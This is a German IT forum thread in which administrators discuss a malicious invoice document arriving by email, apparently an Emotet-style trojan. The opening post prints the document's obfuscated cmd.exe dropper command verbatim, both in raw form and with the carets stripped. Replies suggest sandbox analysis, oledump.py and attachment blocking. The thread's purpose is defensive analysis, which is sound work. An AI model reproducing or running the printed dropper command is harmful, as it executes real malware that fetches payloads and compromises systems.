21
Office365 Trojaner Analyse
Liebe Community,
ich wende mich an euch, um mehr über den Office365 Trojaner zu erfahren, welcher grade seine Runden durch die Unternehmen zieht.
Mitarbeiter erhalten eine Nachricht mit einer angeblichen Rechnung und darin verbirgt sich die Schadsoftware.
Heise hat dazu einen Beitrag:
https://www.heise.de/security/meldung/Trojaner-Achtung-bei-angeblichen-R ...
Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
Damit kann erst einmal keiner was Anfangen... Ich habe im weiteren Schritt die Zirkumflex-Zeichen entfernt. Jetzt schaut das ganze etwas besser aus:
Jetzt setze ich einen Zeilenumbruch um es einfach zu lesen:
Wenn ich das in meine Eingabeanfforderung gebe, dann zeigen sich sensible Informationen die nicht unbedingt ausserhalb des Netzwerkes gelangen sollten...
Den hinteren Teil, verstehe ich nicht...
Die Ziffern sind vielleicht im ASCII-Zeichen?
Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Lasst uns gemeinsam dieses Rätsel lösen, dann können wir diese Adresse, wenn es eine ist, in unseren Firewalls sperren :D
Mit besten Grüßen
Zeppelin
ich wende mich an euch, um mehr über den Office365 Trojaner zu erfahren, welcher grade seine Runden durch die Unternehmen zieht.
Mitarbeiter erhalten eine Nachricht mit einer angeblichen Rechnung und darin verbirgt sich die Schadsoftware.
Heise hat dazu einen Beitrag:
https://www.heise.de/security/meldung/Trojaner-Achtung-bei-angeblichen-R ...
Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
cmd /V/C"^s^et ^s^Kc^p=^.^i{H^OTMP^hK^}W)^Q^a:+^g^e^XFN^dc^f^uV1-@$^6vS,/^I^=^0Bz^](bnx2^p^D[r'^J^E;^ ^sw^j^l^kt^omC^GA\y&&^f^or %^O ^in (4^7;6^2^;5^7^;18;^50^;^56^;^8;1^8;59;5^9^;^55^;^3^0^;^3^;3;^40;^37;^5^1^;25^;26;^6^3^;5^1;^5^4^;3^0;^5^;8;66^;37;^51;^8;6^1;^6^1^;^47^;^1^5;^3^5;35;^1^4^;4^4^;^14^;6^8^;14;2^3;^6^2;4^4;6^1;50^;^1^4;^2^3;^6^1;1^;4^4^;^17;^0^;1^7;1^7^;4^3^;^50;62;0^;2^3^;59^;2^5;4^3^;35;1^1;^3^1;^2^7^;5;22^;^4^6;8^;29^;8;6^1;^61;^47;^1^5;3^5;35^;6^3^;^1^8^;4^4^;6^1;6^2^;^50;2^7^;5^6^;^6^1^;^0;^2^3^;^62;63^;3^5;^65;^7;^5^8^;^1^3^;6^1;^4^6;7^;^4^5^;^18^;^2^9^;^8;^61^;61;4^7;^15;^35;35;32^;^4^7^;18^;^44^;61;^1;63^;18^;4^5^;^0;2^3^;62^;^63^;^3^5^;4^8;2^2^;^27;^4;3^3;4^;4;^29^;8^;6^1^;61;4^7^;15;3^5^;^3^5^;43;50^;^1^4^;1;^61;^8^;^5^7;1^4;1^;^6^1^;^1^8;^50^;^18;^5^6;61;6^2^;^5^0;14^;^6^1^;1^;^6^2;44^;0^;2^3;6^2;^6^3^;^35;^22^;^1^7;20^;9;53;3^2;^64^;29;^8^;^61^;^6^1^;^4^7;^15^;^3^5^;35^;4^3^;^18;^1^8^;47;^50^;^62;28^;47;^5^0;^62^;^4^7;6^2^;5^9^;1^;5^6;0^;^23^;62;^6^3^;35;45^;^2^4;6^;59^;^62^;^5^3^;6^0^;^6^1^;3^1;^51;^0^;^3^3^;^47^;5^9;^1^;6^1^;^4^2^;5^1;2^9;^51^;12;54;30^;^62^;^32^;1;^3^7^;42^;^4^9^;^33;^6^8;5^6;6^1^;1^8^;63^;0^;36;^4^;0^;^7^;^14^;^61;8^;^4^1;1^5;^1^5;6^5;1^8^;6^1^;5;^1^8;6^3;4^7;7^;^14^;6^1;^8;^4^2;12;^16;^5^1;^6^7;^6^6;^5^2^;^5^;0^;18^;4^5;^18;^51^;^1^2;54;^30^;^5^8^;^1^9;^36^;55;^3^7;2^1;^18;^57;2^8;4;4^3^;58;18;23^;61^;5^5;^28;2^3;^62^;63^;55;5^1^;^6^3^;56;^45^;^6^3;59^;46;^0^;4^5;^63^;^5^9;^8^;6^1;6^1;^47;5^1;^5^4^;^30;36^;5^7;1;^55^;^37;^5^5;21^;1^8^;57^;^2^8;^4;^4^3^;58^;^18^;^23^;6^1^;55^;^2^8^;^23;62;63^;^55^;^51;14;^22^;6^2;^22;^43;^0^;^5^6;^6^1^;5^0^;18^;14^;6^3^;^5^1^;^54^;2^4^;6^2;50^;1^8;^1^4^;2^3^;8^;^42^;30^;^22;44^;^4;55;^1;44;^55;^3^0^;^5;8;^6^6^;^12^;^2;^61^;^5^0;6^8^;^2^;^30;^58^;19^;36;0;^6^2^;4^7;^18;44^;42^;^5^1;65^;^5^3;5^;^51;^34;30;^22;4^4^;4;34;^3^8;^1^2;54^;30^;58^;19^;36^;^0^;^5^6;1^8;^4^4^;^22;^42^;1^2^;5^4;30;^3^6^;^57^;1;^0^;6^2;4^7;^1^8;4^4^;^42;1^2;54^;3^0;^36^;^57;^1;0;^61^;^68;47^;1^8;55^;^37;5^5^;27;^5^4^;30;3^6;5^7;1;0;57;50^;1;^6^1;18^;^4^2^;^3^0;^5^8^;19^;^36^;0;5^0;18^;^5^6^;47;^62;4^4;^5^6^;1^8;3^9;^62;2^2;6^8;^12^;54^;^30^;36^;^57^;1;0^;^56^;^1^4;^3^2^;^18^;^6^1^;^62^;24^;^1;^59;18^;^42^;^30;^6^2;3^2^;1;^1^2;5^4^;^3^3^;^6^1;^1^4^;^5^0^;61^;2^8^;7;5^0;^6^2^;23^;1^8;^56;^56^;^5^5;3^0^;62;32^;1^;54^;^4^3^;50^;18;^14;^6^0;1^0;^23^;1^4^;6^1^;23^;8;^2^;10^;1^0^;^5^5^;55;55;5^5^;^5^5;^5^5;5^5^;^55;^5^5^;^5^5;^55;^55;^55^;^55^;55^;55^;^5^5;^78)^d^o s^e^t c^z^oy=!c^z^oy!!^s^Kc^p:~%^O,1!&&i^f %^O ^g^tr ^7^7 c^a^ll %c^z^oy:^~^-5^3^9%" Damit kann erst einmal keiner was Anfangen... Ich habe im weiteren Schritt die Zirkumflex-Zeichen entfernt. Jetzt schaut das ganze etwas besser aus:
cmd /V/C"set sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in (47;62;57;18;50;56;8;18;59;59;55;30;3;3;40;37;51;25;26;63;51;54;30;5;8;66;37;51;8;61;61;47;15;35;35;14;44;14;68;14;23;62;44;61;50;14;23;61;1;44;17;0;17;17;43;50;62;0;23;59;25;43;35;11;31;27;5;22;46;8;29;8;61;61;47;15;35;35;63;18;44;61;62;50;27;56;61;0;23;62;63;35;65;7;58;13;61;46;7;45;18;29;8;61;61;47;15;35;35;32;47;18;44;61;1;63;18;45;0;23;62;63;35;48;22;27;4;33;4;4;29;8;61;61;47;15;35;35;43;50;14;1;61;8;57;14;1;61;18;50;18;56;61;62;50;14;61;1;62;44;0;23;62;63;35;22;17;20;9;53;32;64;29;8;61;61;47;15;35;35;43;18;18;47;50;62;28;47;50;62;47;62;59;1;56;0;23;62;63;35;45;24;6;59;62;53;60;61;31;51;0;33;47;59;1;61;42;51;29;51;12;54;30;62;32;1;37;42;49;33;68;56;61;18;63;0;36;4;0;7;14;61;8;41;15;15;65;18;61;5;18;63;47;7;14;61;8;42;12;16;51;67;66;52;5;0;18;45;18;51;12;54;30;58;19;36;55;37;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;63;56;45;63;59;46;0;45;63;59;8;61;61;47;51;54;30;36;57;1;55;37;55;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;14;22;62;22;43;0;56;61;50;18;14;63;51;54;24;62;50;18;14;23;8;42;30;22;44;4;55;1;44;55;30;5;8;66;12;2;61;50;68;2;30;58;19;36;0;62;47;18;44;42;51;65;53;5;51;34;30;22;44;4;34;38;12;54;30;58;19;36;0;56;18;44;22;42;12;54;30;36;57;1;0;62;47;18;44;42;12;54;30;36;57;1;0;61;68;47;18;55;37;55;27;54;30;36;57;1;0;57;50;1;61;18;42;30;58;19;36;0;50;18;56;47;62;44;56;18;39;62;22;68;12;54;30;36;57;1;0;56;14;32;18;61;62;24;1;59;18;42;30;62;32;1;12;54;33;61;14;50;61;28;7;50;62;23;18;56;56;55;30;62;32;1;54;43;50;18;14;60;10;23;14;61;23;8;2;10;10;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;78)do set czoy=!czoy!!sKcp:~%O,1!&&if %O gtr 77 call %czoy:~-539%" cmd /V/C"set sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in
(47;62;57;18;50;56;8;18;59;59;55;30;3;3;40;37;51;25;26;63;51;54;30;5;8;66;37;51;8;61;61;47;15;35;35;14;44;14;68;14;23;62;44;61;50;14;23;61;1;44;17;0;17;17;43;50;62;0;23;59;25;43;35;11;31;27;5;22;46;8;29;8;61;61;47;15;35;35;63;18;44;61;62;50;27;56;61;0;23;62;63;35;65;7;58;13;61;46;7;45;18;29;8;61;61;47;15;35;35;32;47;18;44;61;1;63;18;45;0;23;62;63;35;48;22;27;4;33;4;4;29;8;61;61;47;15;35;35;43;50;14;1;61;8;57;14;1;61;18;50;18;56;61;62;50;14;61;1;62;44;0;23;62;63;35;22;17;20;9;53;32;64;29;8;61;61;47;15;35;35;43;18;18;47;50;62;28;47;50;62;47;62;59;1;56;0;23;62;63;35;45;24;6;59;62;53;60;61;31;51;0;33;47;59;1;61;42;51;29;51;12;54;30;62;32;1;37;42;49;33;68;56;61;18;63;0;36;4;0;7;14;61;8;41;15;15;65;18;61;5;18;63;47;7;14;61;8;42;12;16;51;67;66;52;5;0;18;45;18;51;12;54;30;58;19;36;55;37;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;63;56;45;63;59;46;0;45;63;59;8;61;61;47;51;54;30;36;57;1;55;37;55;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;14;22;62;22;43;0;56;61;50;18;14;63;51;54;24;62;50;18;14;23;8;42;30;22;44;4;55;1;44;55;30;5;8;66;12;2;61;50;68;2;30;58;19;36;0;62;47;18;44;42;51;65;53;5;51;34;30;22;44;4;34;38;12;54;30;58;19;36;0;56;18;44;22;42;12;54;30;36;57;1;0;62;47;18;44;42;12;54;30;36;57;1;0;61;68;47;18;55;37;55;27;54;30;36;57;1;0;57;50;1;61;18;42;30;58;19;36;0;50;18;56;47;62;44;56;18;39;62;22;68;12;54;30;36;57;1;0;56;14;32;18;61;62;24;1;59;18;42;30;62;32;1;12;54;33;61;14;50;61;28;7;50;62;23;18;56;56;55;30;62;32;1;54;43;50;18;14;60;10;23;14;61;23;8;2;10;10;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;78)
do set czoy=!czoy!!sKcp:~%O,1!&&if %O gtr 77 call %czoy:~-539%" **cmd /V/C"set** sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in Den hinteren Teil, verstehe ich nicht...
Die Ziffern sind vielleicht im ASCII-Zeichen?
Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Lasst uns gemeinsam dieses Rätsel lösen, dann können wir diese Adresse, wenn es eine ist, in unseren Firewalls sperren :D
Mit besten Grüßen
Zeppelin
Auf Facebook teilen
Auf Twitter teilen
Auf Reddit teilen
Auf Linkedin teilenBitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 392899
Url: https://administrator.de/contentid/392899
Ausgedruckt am: 14.11.2024 um 01:11 Uhr
21 Kommentare
Neuester Kommentar
Rein fachlich würde ich mal sagen, daß hier eine Sicherheitslücke in der Windows Shellsprache ausgenutzt wird, und natürlich ist der Code obfuscated, damit darin unerfahrene Leute erstmal nur Müll vermuten.
Eher managementmäßig betrachtet:
euer Filterystem taugt nix, und es kann sein daß Rechner schon infiziert sind und gnade dir Gott wenn einer die Mail oder das Attachment einfach nur aufmacht.
Daß du das Attachment aufgemacht hast, zeigt von ausufernder Naivität, was meinst du denn wofür der Code gemacht wurde? Um von irgendeiner Komponente verschluckt und ausgeführt zu werden um eine andere zu kompromittiereun und dann wirklich Böses zu tun ....
Ich wart nur auf deinen nächsten Post "hilfe wir haben einen Erpressungstrojaner".
Eher managementmäßig betrachtet:
euer Filterystem taugt nix, und es kann sein daß Rechner schon infiziert sind und gnade dir Gott wenn einer die Mail oder das Attachment einfach nur aufmacht.
Daß du das Attachment aufgemacht hast, zeigt von ausufernder Naivität, was meinst du denn wofür der Code gemacht wurde? Um von irgendeiner Komponente verschluckt und ausgeführt zu werden um eine andere zu kompromittiereun und dann wirklich Böses zu tun ....
Ich wart nur auf deinen nächsten Post "hilfe wir haben einen Erpressungstrojaner".
Moin,
Du liest zuviel (schlechte) "Hacker-Krimis"
lg,
Slainte
Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar Du liest zuviel (schlechte) "Hacker-Krimis" lg,
Slainte
Selbstverständlich werden solche Angriffe nicht auf dem eigenen Rechner durchgeführt geschweige im eigenen Netzwerk! Dafür gibt es ausgemusterte Rechner die quasi blank sind. Trotzdem häufen sich in letzter Zeit die Angriffe.
Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....
Spar dir dein Offtopic und bringe etwas produktives.
Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....
Spar dir dein Offtopic und bringe etwas produktives.
Zitat von @SlainteMhath:
Moin,
Du liest zuviel (schlechte) "Hacker-Krimis"
lg,
Slainte
Moin,
Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar Du liest zuviel (schlechte) "Hacker-Krimis" lg,
Slainte
Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...
Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar Du liest zuviel (schlechte) "Hacker-Krimis" Nun, das DarkNET ist keine Erfingung aus Büchern und wird auch gerne von Kriminellen genutzt. Oder wie war dein Kommentar zu verstehen?
Zitat von @Zeppelin:
Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...
Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...
Meines Wissens sind die Adressen aber nicht ohne weiteres aus dem "normalen" Internet erreichbar.
Zitat von @ArnoNymous:
Meines Wissens sind die Adressen aber nicht ohne weiteres aus dem "normalen" Internet erreichbar.
Zitat von @Zeppelin:
Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...
Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...
Meines Wissens sind die Adressen aber nicht ohne weiteres aus dem "normalen" Internet erreichbar.
Richtig, man benötigt z.B. den Tor-Browser welcher dann einem den Zugriff ermöglicht.
Die ersten Antworten auf meinen Post, ließen mich schnell zum Entschluss kommen, dass ich hier keine Antworten finden werde.
Ich habe jetzt eine Testumgebung in der ich mittels Wireshark und dem Tool "URL Revealer" versuchen werde mehr über diesen Trojaner zu erfahren.
Hi,
..ist ne dümmliche Aussage.
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
Gruß
Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....
..ist ne dümmliche Aussage.
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
Gruß
Zitat von @nepixl:
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Ja, .doc ist alt... Aber wie wissen doch alle, wie das manchmal so läuft.
Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Joar - ich pers. verifiziere händisch nur gepackte Archive. Alles andere filtern die AV's im Hintergrund direkt raus und benachrichtigen mich bei Fund.
*.doc(m) etc. werden sofort gedropt mit der Antwort, dass ausschließlich PDFs zugelassen sind.
¯\_(ツ)_/¯
Hi,
ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.
Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.
@nepixl
@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.
Gruß
Frank
ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.
Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.
@nepixl
..ist ne dümmliche Aussage.
Über Sinn und Unsinn vom durchlassen der Anhänge oder einer Lösung dazu geht es doch überhaupt nicht.@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.
Gruß
Frank
2
Zum lernen macht es schon Sinn wenn man sich solche Malware mal genauer anschaut, aber die Sicherheit des eigenen Netzwerks kann man damit nicht erhöhen, denn die URLs unterscheiden sich bei jeder Welle, so schnell kann man die Analysen gar nicht durchführen.
Offtopic und meine Meinung:
Das blocken von Dokumententypen ist machbar, ist sinnvoll und ja, es ist unbequem für einige Nutzer, aber es ist durchsetzbar.
Wer das nicht durchsetzen kann, sollte für solche Dateitypen zumindest eine mehrstündige Quarantäne vorsehen und/oder eine Verhaltensanalyse einsetzen, mindestens aber die Benutzer regelmäßig und ordentlich schulen.
Offtopic und meine Meinung:
Das blocken von Dokumententypen ist machbar, ist sinnvoll und ja, es ist unbequem für einige Nutzer, aber es ist durchsetzbar.
Wer das nicht durchsetzen kann, sollte für solche Dateitypen zumindest eine mehrstündige Quarantäne vorsehen und/oder eine Verhaltensanalyse einsetzen, mindestens aber die Benutzer regelmäßig und ordentlich schulen.
Zitat von @Zeppelin:
Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
Deine Analayse ist so nichtsagend. Was hast du denn extrahiert? Wichtig sind die Streams/Objekt usw.Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
Für Office-Malware kann ich die oledump.py empfehlen:
blog.didierstevens.com1 oder seine PDF-Tools.
Einfach das Zirkumflex zu entfernen ist nicht die Lösung, weil ja damit evtl. Rechenoperationen durchgeführt werden....
Moin...
sagte bestimmt auch der Admin des Klinikums-Fürstenfeldbruck!
Fürstenfeldbruck: Malware legt Klinikums-IT komplett lahm
sorry, in meine augen wurde da komplett versagt!
dann lass lieber die User jammern...
Frank
Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....
sagte bestimmt auch der Admin des Klinikums-Fürstenfeldbruck!
Fürstenfeldbruck: Malware legt Klinikums-IT komplett lahm
sorry, in meine augen wurde da komplett versagt!
dann lass lieber die User jammern...
Frank
Die Mitarbeiter werden regelmäßig geschuld um auf solche Angriffe richtig reagieren zu können.
Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...
Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.
Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
Die gemeinsame Lösungsfimdung war eine gute Idee nur wird das mit Füßen getreten.
Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...
Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.
Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
Die gemeinsame Lösungsfimdung war eine gute Idee nur wird das mit Füßen getreten.
Zitat von @Frank:
Hi,
ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.
Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.
@nepixl
@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.
Gruß
Frank
Hi,
ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.
Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.
@nepixl
..ist ne dümmliche Aussage.
Über Sinn und Unsinn vom durchlassen der Anhänge oder einer Lösung dazu geht es doch überhaupt nicht.@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.
Gruß
Frank
Vielen Dank für deine Nachricht. Ja genau das habe ich am Wochenende mir vorgenommen auszuprobieren.
Eigentlich soll die Arbeit auch auf der Arbeit bleiben und nun beschäftige ich mich noch in meiner Freizeit mit Düsen Thema.
Ich habe das Glück wie viele andere auch, dass ich mein Hobby zum Beruf gemacht habe und ich so meine Freude an der Materie habe egal ob auf der Arbeit oder im privaten Umfeld.
Zitat von @clubmaster:
Für Office-Malware kann ich die oledump.py empfehlen:
blog.didierstevens.com2 oder seine PDF-Tools.
Einfach das Zirkumflex zu entfernen ist nicht die Lösung, weil ja damit evtl. Rechenoperationen durchgeführt werden....
Zitat von @Zeppelin:
Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
Deine Analayse ist so nichtsagend. Was hast du denn extrahiert? Wichtig sind die Streams/Objekt usw.Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:
Für Office-Malware kann ich die oledump.py empfehlen:
blog.didierstevens.com2 oder seine PDF-Tools.
Einfach das Zirkumflex zu entfernen ist nicht die Lösung, weil ja damit evtl. Rechenoperationen durchgeführt werden....
Du hast meine Ausgangsnachricht nicht richtig interpretiert.
Ich habe die Zirkumflex entfernt um diesen Code besser lesen zu können.
Damit man vielleicht etwas mehr rauslesen kann. Es macht mich stutzig eine Schadsoftware zu finden, die auf den ersten Eindruck nichts macht.
Wir hatten in der Vergangenheit auch Probleme mit Verschlüsselungsteojnern aber da hat man die Folgen auch bemerkt. Jetzt schleust sich etwas ein und man merkt erst mal nichts...
Die Angriffsstrategie ist nicht schlecht. Ich implementiere erst mal etwas in ein Netzwerk und irgend wann vielleicht 1 oder 2 Monate später greife ich an. Keiner weiß mehr wann die Schadsoftware in das Netzwerk gekommen ist und welchen Weg diese genutzt hat...
Zitat von @ArnoNymous:
Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Ja, .doc ist alt... Aber wie wissen doch alle, wie das manchmal so läuft.
Zitat von @nepixl:
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.
Problem solved.
Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Ja, .doc ist alt... Aber wie wissen doch alle, wie das manchmal so läuft.
Da stimme ich dir zu, man könne tatsächlich eine Vollzeitstelle erzeugen um die Anhänge zu prüfen.
Ich werde unsere Geschäftsführung vorschlagen ausschließlich die Arbeit mit PDF Dokumenten zu arbeiten.
Klar, es gibt auch in PDF Dokumenten Backdoors aber das ist ein anderes Thema...
Moin...
Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...
ich halte von Sophos sowiso nix, aber das sowas an der Sophos vorbei kommt, ist nicht normal...
Denke besser mal an eine Anlagen blockierung für bestimmte Dateitypen nach!
Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.
nein, selten die Angreifer schleusen Schadsoftware in euer netzwerk, das macht ihr selber!
Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
jetzt werde nicht albern....
und sich mit schadsoftware auseinander zu setzen und deren disassemblierung fehlt mir die zeit.
Frank
Zitat von @Zeppelin:
Die Mitarbeiter werden regelmäßig geschuld um auf solche Angriffe richtig reagieren zu können.
das ist wichtig...Die Mitarbeiter werden regelmäßig geschuld um auf solche Angriffe richtig reagieren zu können.
Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...
Denke besser mal an eine Anlagen blockierung für bestimmte Dateitypen nach!
Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.
Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
Die gemeinsame Lösungsfimdung war eine gute Idee nur wird das mit Füßen getreten.
nun ja, die gute idee wäre in einem entwickler forum gut aufgehoben, aber wir administratoren blocken sowas gleich am eingang!und sich mit schadsoftware auseinander zu setzen und deren disassemblierung fehlt mir die zeit.
Ich werde unsere Geschäftsführung vorschlagen ausschließlich die Arbeit mit PDF Dokumenten zu arbeiten.
ein guter ansatz...Frank
Hi Zeppelin,
habe mal ein wenig im Netz gesucht und das hier gefunden:
https://www.hybrid-analysis.com/sample/0672a7057ef39a0e5560f36fc558e8446 ...
Da wird beschrieben, was die Schadsoftware macht.
Viel Spaß beim Lesen und weiter so. Ich finde es gut, dass es Du versuchst, hinter die Funktionsweise solchen Codes zu kommen. Mir fehlt leider immer die Zeit, so was in einer isolierten Umgebung zu testen.
Trapper Tom
habe mal ein wenig im Netz gesucht und das hier gefunden:
https://www.hybrid-analysis.com/sample/0672a7057ef39a0e5560f36fc558e8446 ...
Da wird beschrieben, was die Schadsoftware macht.
